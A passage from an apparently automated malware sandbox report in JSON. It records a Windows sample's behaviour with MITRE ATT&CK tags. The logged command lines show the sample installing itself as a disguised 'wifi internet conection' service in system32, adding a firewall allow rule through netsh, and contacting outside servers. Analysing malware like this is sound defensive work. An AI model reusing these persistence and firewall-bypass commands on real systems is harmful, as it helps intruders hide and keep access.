\"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6b790000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6b540000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 6a0b0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 69b90000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75850000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 686c0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6b780000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 6a480000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 6a410000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6b700000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 68100000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76300000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75350000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f30000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74e60000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 759e0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75950000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bdc0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 761e0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77760000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77760000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77760000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77760000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74bf0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 753f0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6e4b0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75640000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74a30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74b30000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76080000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ae0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 75bb0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 735e0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 737b0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75850000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 736c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73ae0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73410000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77760000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 733e0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74e20000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74ce0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 733d0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 76120000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73720000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71b10000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 752e0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77760000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74980000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"qhdkbaei.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67EE4FD0.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e1c6c@ADVAPI32.dll\"\n \"0e000f00703f1c6c@ADVAPI32.dll\"\n \"0e000f00cc3f1c6c@ADVAPI32.dll\"\n \"11001200b4471c6c@ADVAPI32.dll\"\n \"1100120048481c6c@ADVAPI32.dll\"\n \"120013008c481c6c@ADVAPI32.dll\"\n \"12001300e4481c6c@ADVAPI32.dll\"\n \"14001500dc6f1c6c@ADVAPI32.dll\"\n \"14001500f46f1c6c@ADVAPI32.dll\"\n \"140015000c701c6c@ADVAPI32.dll\"\n \"1700180024701c6c@ADVAPI32.dll\"\n \"0d000e003c701c6c@ADVAPI32.dll\"\n \"110012004c701c6c@ADVAPI32.dll\"\n \"1100120060701c6c@ADVAPI32.dll\"\n \"0d000e0034491c6c@SHELL32.dll\"\n \"0d000e00b0491c6c@SHELL32.dll\"\n \"0f001000a0711c6c@ADVAPI32.dll\"\n \"14001500e0711c6c@ADVAPI32.dll\"\n \"14001500f8711c6c@ADVAPI32.dll\"\n \"0c000d0040721c6c@ADVAPI32.dll\"\n \"0c000d0050721c6c@ADVAPI32.dll\"\n \"0e000f0060721c6c@ADVAPI32.dll\"\n \"0e000f0070721c6c@ADVAPI32.dll\"\n \"0b000c0080721c6c@ADVAPI32.dll\"\n \"18001900b8741c6c@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"qhdkbaei.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"DISMHOST.EXE.67EE4FD0.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005876)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005848)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005848)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005848)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005848)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006124)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006124)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006124)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006124)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004152)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004152)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004152)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004152)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004152)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004152)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003436)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002232)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002564)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002564)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005876)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\njrbicei\\ (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\njrbicei\\\" - (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\qhdkbaei.exe\" %WINDIR%\\system32\\njrbicei\\\" - (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create njrbicei binPath= \"%WINDIR%\\system32\\njrbicei\\qhdkbaei.exe /d\\\"C:\\25c97105d482ed561e53b782cf\" - (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description njrbicei \"wifi internet conection\"\" - (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start njrbicei\" - (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005876)\n \"qhdkbaei.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00003436)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75850000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75850000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75850000\n \"qhdkbaei.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75850000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75850000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75850000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qhdkbaei.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00006124)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00005848)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qhdkbaei.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00006124)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\qhdkbaei ...\" (UID: 00000000-00004152), Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00006136), Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00004192), Spawned process \"qhdkbaei.exe\" with commandline \"/d\"C:\\\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492 ...\" (UID: 00000000-00003436)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002232), Spawned process \"svchost.exe\" (UID: 00000000-00002564)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00005848)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qhdkbaei.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00006124)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\qhdkbaei ...\" (UID: 00000000-00004152), Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00006136), Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00004192), Spawned process \"qhdkbaei.exe\" with commandline \"/d\"C:\\\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492 ...\" (UID: 00000000-00003436)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002232), Spawned process \"svchost.exe\" (UID: 00000000-00002564)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched 